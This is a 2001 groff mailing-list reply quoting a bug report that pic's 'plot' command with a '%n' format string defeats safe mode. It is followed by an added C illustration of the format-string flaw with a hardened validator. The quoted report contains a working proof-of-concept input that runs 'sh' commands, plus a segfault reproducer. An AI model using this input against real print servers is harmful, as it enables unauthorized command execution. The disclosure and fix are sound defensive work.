[Groff] Re: Bug#107459: pic can be forced to run commands in safe mode
From: Colin Watson
Subject: [Groff] Re: Bug#107459: pic can be forced to run commands in safe mode
Date: Thu, 2 Aug 2001 12:38:57 +0100
User-agent: Mutt/1.2.5i
On Thu, Aug 02, 2001 at 11:36:37AM +0200, Arnaud Giersch wrote:
> Package: groff
> Version: 1.15.2-1
>
> pic can be forced to execute commands (sh X..X) when running in safe
> mode (-S). It can be exploited through lpd when groff/pic is run in
> print filters, and arbitrary commands with id of lpd can be run.
>
> The pic command 'plot -1.99854281554743185012 "%n"' will overwrite the memory
> where the safe mode variable is stored and then allows the "sh" command
> to be used.
>
> How to reproduce:
>
> pic -S > /dev/null << EOT
> .PS
> plot -1.99854281554743185012 "%n"
> sh Xid >&2X
> .PE
> EOT
>
> Actual Results: uid=1000(giersch) gid=300(parallel) ...
>
> Expected Results: pic:<standard input>:3: unsafe to run command `id >&2'
>
> Bug has been discovered by Zenith Parsec <address@hidden>. Exploit
> with patch has been posted to bugtraq:
> http://www.securityfocus.com/bid/3103
>
> I've made a patched version for Potato (groff_1.15.2-1.ag)
> available at:
> http://arnaud.giersch.free.fr/debian/
>
> As far as I can see in the sources, the other versions (Woody and Sid)
> are vulnerable too.
Hi,
Are you aware of this problem? I haven't seen any traffic about it here.
Although I haven't yet managed to overwrite the correct bit of memory to
make the exploit work, I've got pic 1.17.2 to segfault by varying plot's
first argument, which is a good indication that something's wrong. The
relevant code in 1.15.2 and 1.17.2 seems largely identical.
At the very least, this should reliably segfault:
$ pic -S >/dev/null
.PS
plot 0 "%n"
Thanks,
--
Colin Watson address@hidden
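As an added illustration, not code from groff, from the bug report or from this thread: the bug class behind the report in C. pic's `plot expr "fmt"` hands the user's format string to sprintf with one double argument, and "%n" is not a conversion but a write, storing the number of bytes emitted so far through the int* it takes as its next vararg. The vulnerable shape is shown beside a hardened one that accepts a format only if it contains at most one floating-point conversion. The names plot_unsafe, plot_safe, plot_safe_str, format_is_safe, double_low_word and double_high_word are mine. The reading that, on a 32-bit stack, the first four bytes of the double's bit pattern are what "%n" consumes as its pointer, which is why the report's constant is so specific, is my analysis of the report rather than something the thread states.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not groff code. pic's `plot expr "fmt"` passes the
 * user's format string to sprintf with one double argument. "%n" does
 * not print anything: it stores the number of bytes written so far
 * through the int* it takes as its next vararg, so a user-chosen format
 * becomes a memory write. */

/* Vulnerable shape: the format string is attacker data. Never call this
 * with "%n" for real; it is here to show the pattern, not to run it. */
int plot_unsafe(char *out, size_t outlen, const char *fmt, double v)
{
    return snprintf(out, outlen, fmt, v);
}

/* Hardened shape: allow only what a number format needs. Flags, width
 * and precision are fine; the conversion must be one of e E f g G; no
 * length modifiers; no %n, %s, %x, %p; at most one conversion because
 * exactly one value is supplied. Returns 1 if fmt is acceptable. */
int format_is_safe(const char *fmt)
{
    int conversions = 0;
    for (const char *p = fmt; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')                     /* "%%" is a literal percent */
            continue;
        while (*p && strchr("-+ #0", *p))  /* flags */
            p++;
        while (isdigit((unsigned char)*p)) /* width */
            p++;
        if (*p == '.') {                   /* precision */
            p++;
            while (isdigit((unsigned char)*p))
                p++;
        }
        if (!*p || !strchr("eEfgG", *p))  /* anything else is rejected */
            return 0;
        if (++conversions > 1)
            return 0;
    }
    return 1;
}

/* Safe-mode behaviour: refuse the format instead of formatting it.
 * Returns -1 on refusal, otherwise snprintf's byte count. */
int plot_safe(char *out, size_t outlen, const char *fmt, double v)
{
    if (!format_is_safe(fmt))
        return -1;
    return snprintf(out, outlen, fmt, v);
}

/* Convenience wrapper: NULL when refused, else the formatted text. */
const char *plot_safe_str(const char *fmt, double v)
{
    static char buf[64];
    return plot_safe(buf, sizeof buf, fmt, v) < 0 ? NULL : buf;
}

/* Why the report uses one very specific double: on a 32-bit stack the
 * 8-byte double occupies the vararg slots, and "%n" consumes the first
 * 4 bytes of it as its int*. On little-endian x86 that is the low word
 * of the IEEE-754 bit pattern (my reading of the report). */
uint32_t double_low_word(double d)
{
    uint64_t bits;
    memcpy(&bits, &d, sizeof bits);
    return (uint32_t)bits;
}

uint32_t double_high_word(double d)
{
    uint64_t bits;
    memcpy(&bits, &d, sizeof bits);
    return (uint32_t)(bits >> 32);
}

int main(void)
{
    const double carrier = -1.99854281554743185012; /* from the report */
    const char *formats[] = { "%g", "%.2f", "%5.2e%%", "%n", "%s", "%g %g" };
    for (size_t i = 0; i < sizeof formats / sizeof formats[0]; i++)
        printf("%-10s %s\n", formats[i],
               format_is_safe(formats[i]) ? "accepted" : "refused");
    printf("%s\n", plot_safe_str("%.2f", 3.14159));
    /* The low word lands in the 0x08xxxxxx range where a 32-bit Linux
     * ELF keeps its data and bss, i.e. where a global flag would live. */
    printf("exploit constant: high 0x%08x low 0x%08x\n",
           (unsigned)double_high_word(carrier),
           (unsigned)double_low_word(carrier));
    return 0;
}
```

Build with `cc -std=c99 -Wall plot_fmt.c` (file name is mine). The validator is deliberately stricter than printf itself: it rejects length modifiers such as "%lf" even though they would be harmless here, because an allow-list of a handful of conversions is easier to reason about than a deny-list of the dangerous ones, and a refused format is exactly what the reporter's "Expected Results" line asks safe mode to produce.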